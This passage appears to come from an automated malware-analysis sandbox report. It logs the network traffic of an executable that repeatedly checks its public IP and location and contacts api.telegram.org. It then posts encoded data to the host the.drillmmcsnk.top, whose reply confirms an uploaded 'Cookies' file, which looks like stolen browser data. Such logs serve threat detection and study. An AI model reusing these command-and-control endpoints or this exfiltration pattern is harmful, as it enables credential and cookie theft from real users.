                                                                                                                                    Nov 26, 2024 09:47:23.771730900 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.771781921 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.771857023 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.772321939 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.772334099 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.140638113 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.140804052 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.143830061 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.143860102 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.144126892 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.145662069 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.191337109 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649388075 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649460077 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649522066 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.654918909 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:31.271353960 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:31.953756094 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.073987961 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.074085951 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.074982882 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.080909967 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.194951057 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.200956106 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.200970888 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:33.427690983 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:33.481152058 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:38.349345922 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:38.349493980 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:03.572771072 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:03.932029009 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:04.635138988 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:05.838269949 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:08.322684050 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:13.135317087 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:22.822746038 CET4978680192.168.2.75.182.211.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 09:46:51.490933895 CET | 51604 | 53 | 192.168.2.7 | 1.1.1.1
Nov 26, 2024 09:46:51.632587910 CET | 53 | 51604 | 1.1.1.1 | 192.168.2.7
Nov 26, 2024 09:46:54.222032070 CET | 63662 | 53 | 192.168.2.7 | 1.1.1.1
Nov 26, 2024 09:46:54.365021944 CET | 53 | 63662 | 1.1.1.1 | 192.168.2.7
Nov 26, 2024 09:47:23.623055935 CET | 58269 | 53 | 192.168.2.7 | 1.1.1.1
Nov 26, 2024 09:47:23.768070936 CET | 53 | 58269 | 1.1.1.1 | 192.168.2.7
Nov 26, 2024 09:47:31.376580000 CET | 59437 | 53 | 192.168.2.7 | 1.1.1.1
Nov 26, 2024 09:47:31.950150013 CET | 53 | 59437 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 09:46:51.490933895 CET | 192.168.2.7 | 1.1.1.1 | 0xebf | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:54.222032070 CET | 192.168.2.7 | 1.1.1.1 | 0x54bc | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:47:23.623055935 CET | 192.168.2.7 | 1.1.1.1 | 0xfe9b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:47:31.376580000 CET | 192.168.2.7 | 1.1.1.1 | 0xec13 | Standard query (0) | the.drillmmcsnk.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:51.632587910 CET | 1.1.1.1 | 192.168.2.7 | 0xebf | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:54.365021944 CET | 1.1.1.1 | 192.168.2.7 | 0x54bc | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:46:54.365021944 CET | 1.1.1.1 | 192.168.2.7 | 0x54bc | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:47:23.768070936 CET | 1.1.1.1 | 192.168.2.7 | 0xfe9b | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 09:47:31.950150013 CET | 1.1.1.1 | 192.168.2.7 | 0xec13 | No error (0) | the.drillmmcsnk.top |  | 5.182.211.149 | A (IP address) | IN (0x0001) | false
                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                    • api.telegram.org
                                                                                                                                    • checkip.dyndns.org
                                                                                                                                    • the.drillmmcsnk.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:46:51.767282009 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
Nov 26, 2024 09:46:53.245064974 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:52 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:46:53.253727913 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
Nov 26, 2024 09:46:53.757086992 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:53 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:46:56.230967999 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
Nov 26, 2024 09:46:56.717119932 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:56 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:46:58.564237118 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
Nov 26, 2024 09:47:00.052484035 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:59 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49705 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:01.948117971 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:03.407274008 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:03 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49712 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:05.249593973 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:07.355262041 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:07 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49726 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:09.192804098 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:11.751053095 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:11 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49741 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:13.593511105 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:15.113097906 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:14 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49748 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:17.050232887 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:18.539872885 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:18 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49760 | 132.226.8.169 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:20.391710997 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 26, 2024 09:47:21.848341942 CET | 272 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:47:21 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49786 | 5.182.211.149 | 80 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 09:47:32.074982882 CET | 143 | OUT | POST /den/P4.php HTTP/1.1
Content-Type: text/plain; charset=utf-8
Host: the.drillmmcsnk.top
Content-Length: 1432
Connection: Keep-Alive
Nov 26, 2024 09:47:32.080909967 CET | 1432 | OUT |
                                                                                                                                    Data Ascii: Oot318RF/IM01mn226TDsDnI9k64sNzsS2GzIyul9oXERLtzDqymzgohnFuTWBuc4UOf6zh4fezyF3Jb5aomYApGlM2IZ+Ud7ODVinHSkavuZNWS1MHQu/3ufbsIkeagg8b41z4LfM4bUwurwJHmvk2m7thijOTHqseg1hS2CcOcXIWBRrrFuGMJ3cu7qFlfgZZli4MJgBEVbjf7YQ26eBh+1kVGF8QKxn+UqGjjaugVMi5QNyD
Nov 26, 2024 09:47:33.427690983 CET | 250 | IN | HTTP/1.1 201 Created
content-type: text/html; charset=UTF-8
content-length: 86
date: Tue, 26 Nov 2024 08:47:33 GMT
server: LiteSpeed
connection: Keep-Alive
Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_2179.txt"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:46:55 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:46:56 UTC | 849 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:46:56 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 574725
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjls3R8upyG98iW%2BtfOvuvmIIXf4gmsCWzUPCJC6fGVpJ5hOJ84lEP7FAFKO2m3tnIVBTS5DLDG2AFILAHOQ3Vl8oFfx3MDbX3qg0SiyCTwJGW6hxx2B4g8P96%2BAjKKTfBLrUfZf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e889c60486ec345-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1808049&cwnd=178&unsent_bytes=0&cid=7447ace6ec9778a4&ts=525&x=0"
2024-11-26 08:46:56 UTC | 361 | IN |
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749701104.21.67.1524436748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-26 08:46:57 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    2024-11-26 08:46:58 UTC853INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:58 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574727
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZv%2BNRB%2FI8M3qNgk1MTbn%2B0xOgu69O9jtYm4OoEVDe4u1A2ksBMOdAE6mrAfFfjLn6l8S2i9tt89bLHxbPSq6necXnrraMUepdJu5Jn5Z6ioUI9cX4lDk7wuz4d8r2Pc3aNg8gX%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c6e2b754361-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2157&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1331509&cwnd=218&unsent_bytes=0&cid=ca5b94c98f601454&ts=464&x=0"
2024-11-26 08:46:58 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:01 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
2024-11-26 08:47:01 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:01 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574730
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgxlzuOfg7NRBT9Z9HLzpF9xujB7VT7qYjhkHQ1yQDawcrzz6NXlHcDoj3J1TRzPw%2BuP9CBkdzgEYhOlQTwulxsQfpRqSpu%2F3jbXNZdcE41btlz1rCf09tv1s%2BDJXae9CAt6wiQD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c83493d42a9-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1593886&cwnd=190&unsent_bytes=0&cid=56782a2853e71e13&ts=469&x=0"
2024-11-26 08:47:01 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49706 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:04 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
2024-11-26 08:47:05 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:04 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574733
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eu%2FI%2Bj6p3UNXFS2W4x6bp2oMjM9qoozJTVerdhpqqjY%2BO44pqPAdAZbEJIBaJ6FgxDqeQVBYyo%2FOwLeyOn1tXuGN7UTWeLIkyEvz%2BUWeQWsuC3i472R1pAqPFQQ0VT%2FQMxSGfcTC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889c97e8030f81-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1726788&cwnd=238&unsent_bytes=0&cid=71c95eeb9099a845&ts=459&x=0"
2024-11-26 08:47:05 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49718 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:08 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
2024-11-26 08:47:09 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:08 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574737
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHQp%2B8uptKGsf3D0%2F35SPF8bUpLRjTX9MLMDJiDancedy1PDm2WbN999XxibH2iCEkfnjvs8j7aXOmrkvlvoul33gvv5XGSTq00fyQhW%2BYcWqxnlhXmWTP%2F1Xr%2FqtRAtkmQ%2BDOoL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889cb08f3d42c8-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1526&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1825000&cwnd=225&unsent_bytes=0&cid=0a8981b5d2fa900b&ts=459&x=0"
2024-11-26 08:47:09 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49734 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:13 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
2024-11-26 08:47:13 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574742
